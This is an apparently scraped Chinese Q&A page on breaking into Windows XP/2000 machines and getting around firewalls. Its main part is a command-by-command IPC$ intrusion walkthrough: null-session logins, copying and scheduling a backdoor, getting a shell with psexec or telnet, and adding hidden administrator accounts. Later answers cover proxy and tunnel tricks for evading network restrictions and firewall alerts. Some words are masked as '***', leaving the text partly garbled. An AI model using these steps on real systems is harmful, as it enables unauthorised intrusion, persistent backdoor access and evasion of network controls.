本文目录一览:
- 1、如何入侵内网中。瑞星防火墙+杀毒软件的XP系统
- 2、防火墙入侵
- 3、怎么破解防火墙
- 4、如何入侵有防火墙的主机?
- 5、电脑上有装防火墙(更新的),但电脑上有漏洞(番茄的没更新)这样小黑(黑客)能入侵进来不?
- 6、黑客入侵网站时,怎样绕过防火墙?
如何入侵内网中。瑞星防火墙+杀毒软件的XP系统
1 )建立空连接 :
net use \\127.0.0.1\ipc$ "" /user:""
2 )建立非空连接 :
net use \\127.0.0.1\ipc$ " 密码 " /user:" 用户名 "
3 )删除连接 :
net use \\127.0.0.1\ipc$ /del
2 在 ipc$ 连接中对远程主机的操作命令
1 ) 查看远程主机的共享资源(看不到默认共享) :
net view \\127.0.0.1
2 ) 查看远程主机的当前时间 :
net time \\127.0.0.1
3 ) 得到远程主机的 netbios 用户名列表 :
nbtstat -A 127.0.0.1
4 )映射 / 删除远程共享 :
net use z: \\127.0.0.1\c
此命令将共享名为 c 的共享资源映射为本地 z 盘
net use z: /del
删除映射的 z 盘,其他盘类推
5 )向远程主机复制文件 :
copy 路径 \ 文件名 \\IP\ 共享目录名,如:
copy c:\xinxin.exe \\127.0.0.1\c$ 即将 c 盘下的 xinxin.exe 复制到对方 c 盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy \\127.0.0.1\c$\xinxin.exe c:\
6 )远程添加计划任务 :
at \\IP 时间 程序名 如:
at \\127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用 24 小时制;如果你打算运行的程序在系统默认搜索路径(比如 system32/ )下则不用加路径,否则必须加全路径
3 本地命令
1 )查看本地主机的共享资源(可以看到本地的默认共享)
net share
2 )得到本地主机的用户列表
net user
3 )显示本地某用户的帐户信息
net user 帐户名
4 )显示本地主机当前启动的服务
net start
5 )启动 / 关闭本地服务
net start 服务名
net stop 服务名
6 )在本地添加帐户
net user 帐户名 密码 /add
7 )激活禁用的用户
net uesr 帐户名 /active:yes
8 )加入管理员组
net localgroup administrators 帐户名 /add
很显然的是,虽然这些都是本地命令,但如果你在远程主机的 shell 中输入,比如你 telnet 成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。
4 其他一些命令
1 ) telnet
telnet IP 端口
telnet 127.0.0.0 23
2 )用 opentelnet.exe 开启远程主机的 telnet
OpenTelnet.exe \\ip 管理员帐号 密码 NTLM 的认证方式 port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1 )目标开启了 ipc$ 共享
2 )你要拥有管理员密码和帐号
3 )目标开启 RemoteRegistry 服务,用户就可以更改 ntlm 认证
4 )对仅 WIN2K/XP 有效
3 )用 psexec.exe 一步获得 shell ,需要 ipc 管道支持
psexec.exe \\IP -u 管理员帐号 -p 密码 cmd
psexec.exe \\127.0.0.1 -u administrator -p "" cmd
十三 对比过去和现今的 ipc$ 入侵
既然是对比,那么我就先把过去的 ipc$ 入侵步骤写给大家,都是蛮经典的步骤:
[1]
C:\net use \\127.0.0.1\ipc$ "" /user:admintitrators
\\ 用扫到的空口令建立连接
[2]
c:\net view \\127.0.0.1
\\ 查看远程的共享资源
[3]
C:\copy srv.exe \\127.0.0.1\admin$\system32
\\ 将一次性后门 srv.exe 复制到对方的系统文件夹下,前提是 admin$ 开启
[4]
C:\net time \\127.0.0.1
\\ 查看远程主机的当前时间
[5]
C:\at \\127.0.0.1 时间 srv.exe
\\ 用 at 命令远程运行 srv.exe ,需要对方开启了 'Task Scheduler' 服务
[6]
C:\net time \\127.0.0.1
\\ 再次查看当前时间来估算 srv.exe 是否已经运行,此步可以省略
[7]
C:\telnet 127.0.0.1 99
\\ 开一个新窗口,用 telnet 远程登陆到 127.0.0.1 从而获得一个 shell( 不懂 shell 是什么意思?那你就把它想象成远程机器的控制权就好了,操作像 DOS) , 99 端口是 srv.exe 开的一次性后门的端口
[8]
C:\WINNT\system32net start telnet
\\ 我们在刚刚登陆上的 shell 中启动远程机器的 telnet 服务,毕竟 srv.exe 是一次性的后门,我们需要一个长久的后门便于以后访问,如果对方的 telnet 已经启动,此步可省略
[9]
C:\copy ntlm.exe \\127.0.0.1\admin$\system32
\\ 在原来那个窗口中将 ntlm.exe 传过去, ntlm.exe 是用来更改 telnet 身份验证的
[10]
C:\WINNT\system32ntlm.exe
\\ 在 shell 窗口中运行 ntlm.exe ,以后你就可以畅通无阻的 telnet 这台主机了
[11]
C:\telnet 127.0.0.1 23
\\ 在新窗口中 telnet 到 127.0.0.1 ,端口 23 可省略,这样我们又获得一个长期的后门
[12]
C:\WINNT\system32net user 帐户名 密码 /add
C:\WINNT\system32net uesr guest /active:yes
C:\WINNT\system32net localgroup administrators 帐户名 /add
\\telnet 上以后,你可以建立新帐户,激活 guest ,把任何帐户加入管理员组等
好了,写到这里我似乎回到了 2 , 3 年前,那时的 ipc$ 大家都是这么用的,不过随着新工具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高效而简单的 ipc$ 入侵吧。
[1]
psexec.exe \\IP -u 管理员帐号 -p 密码 cmd
\\ 用这个工具我们可以一步到位的获得 shell
OpenTelnet.exe \\server 管理员帐号 密码 NTLM 的认证方式 port
\\ 用它可以方便的更改 telnet 的验证方式和端口,方便我们登陆
[2]
已经没有第二步了,用一步获得 shell 之后,你做什么都可以了,安后门可以用 winshell ,克隆就用 ca 吧,开终端用 3389.vbe ,记录密码用 win2kpass ,总之好的工具不少,随你选了,我就不多说了。
防火墙入侵
防火墙提示系统被攻击
常见的个人防火墙程序所谓的“攻击”并不一定是真正的 *** 攻击,很多防火墙程序会将 *** 广播等最常见的 *** 访问当作攻击来提示我们并记录下来(局域网内此类的提示尤其多)。另外的“攻击”则可能是有人在扫描你计算机的端口,或者是其他人中了病毒,病毒在利用染毒的计算机扫描 *** 上的其他电脑。
一般这种情况,只要你定期更新了系统补丁,这些所谓的“攻击”一般是不会造成任何威胁的。
个人认为防火墙程序的这种提示也是一种变相的“广告”而已--你看我多么地有用啊,功能多强大! *** 上有这么多的攻击,我都替你拦截了,用我是没有错的!--要真有了攻击,它告诉你没有拦截住,你还会用它吗?我估计你是会马上换防火墙了,对吧?
怎么破解防火墙
可能现在对局域网上网用户限制比较多,比如不能上一些网站,不能玩某些游戏,不能上MSN,端口限制等等,一般就是通过 *** 服务器上的软件进行限制,如现在谈的最多的ISA Server 2004,或者是通过硬件防火墙进行过滤。下面谈谈如何突破限制,需要分限制情况进行说明:
一、单纯的限制某些网站,不能访问, *** 游戏(比如联众)不能玩,这类限制一般是限制了欲访问的IP地址。
对于这类限制很容易突破,用普通的HTTP *** 就可以了,或者SOCKS *** 也是可以的。现在网上找HTTP *** 还是很容易的,一抓一大把。在IE里加了HTTP *** 就可以轻松访问目的网站了。
二、限制了某些协议,如不能FTP了等情况,还有就是限制了一些 *** 游戏的服务器端IP地址,而这些游戏又不支持普通HTTP *** 。
这种情况可以用SOCKS *** ,配合Sockscap32软件,把软件加到SOCKSCAP32里,通过SOCKS *** 访问。一般的程序都可以突破限制。对于有些游戏,可以考虑Permeo Security Driver 这个软件。如果连SOCKS也限制了,那可以用socks2http了,不会连HTTP也限制了吧。
三、基于包过滤的限制,或者禁止了一些关键字。这类限制就比较强了,一般是通过 *** 服务器或者硬件防火墙做的过滤。比如:通过ISA Server 2004禁止MSN ,做了包过滤。这类限制比较难突破,普通的 *** 是无法突破限制的。
这类限制因为做了包过滤,能过滤出关键字来,所以要使用加密 *** ,也就是说中间走的HTTP或者SOCKS *** 的数据流经过加密,比如跳板,SSSO, FLAT等,只要 *** 加密了就可以突破了, 用这些软件再配合Sockscap32,MSN就可以上了。 这类限制就不起作用了。
四、基于端口的限制,限制了某些端口,最极端的情况是限制的只有80端口可以访问,也就只能看看网页,连OUTLOOK收信,FTP都限制了。当然对于限制几个特殊端口,突破原理一样。
这种限制可以通过以下办法突破:
1、找普通HTTP80端口的 *** ,12.34.56.78:80,象这样的,配合socks2http,把HTTP *** 装换成SOCKS *** ,然后再配合SocksCap32,就很容易突破了。这类突破办法中间走的 *** 未 加密。通通通软件也有这个功能。
2、用类似FLAT软件,配合SocksCap32,不过所做的FLAT *** 更好也是80端口,当然不是80端口也没关系,因为FLAT还支持再通过普通的HTTP *** 访问,不是80端口,就需要再加一个80端口的HTTP *** 。这类突破办法中间走的 *** 加密,网管不知道中间所走的数据是什么。 *** 跳板也可以做到,不过 *** 仍然要80端口的。对于单纯是80端口限制,还可以用一些端口转换的技术突破限制。
五、以上一些限制综合的,比如有限制IP的,也有限制关键字,比如封MSN,还有限制端口的情况。
一般用第四种情况的第二个办法就可以完全突破限制。只要还允许上网,呵呵,所有的限制都可以突破。
如何入侵有防火墙的主机?
严格意义上说没有电脑是不可以侵入的,只是难度上有大小而已。不过这是一个违法的行为。不建议学习。如果想知道可以在baidu里搜寻一下。有很多的黑客软件可以直接用的。 比如说冰河什么的
电脑上有装防火墙(更新的),但电脑上有漏洞(番茄的没更新)这样小黑(黑客)能入侵进来不?
1.你的机器上只要没有什么重要的资料,即使有黑客侵入了,他有什么用?
2.即使有,譬如玩网游的话,装好防火墙,常保持更新,应该能阻挡。
3.真的碰上了,能绕过你防火墙侵入你系统的黑客(这种黑客也不会来),即使你打齐了补丁也没用!
4.但这并不是说装了防火墙就万事无忧了,更好你还是打齐补丁的好,倒不是说防黑客,而是防系统一些未知的漏洞给你使用电脑时带来的不愉快。
你若说因为番茄的版本是D版不敢去Windows Update的话,你给我了个消息。
很简单就能解决到微软网站上去认证时的问题的。
消息里贴这个问题的链接。
黑客入侵网站时,怎样绕过防火墙?
不是防火墙察觉不到,而是防火墙认为他是合法用户,合法操作,所以防火墙是不会报警的
要不被防火墙察觉到,就要在入侵了的机器上使用以经授权的程序 比如黑客可以使用PCANYWHERE远程接入肉J 之后进行一切操作 而防火墙是会认为这是合法的 所以不会报警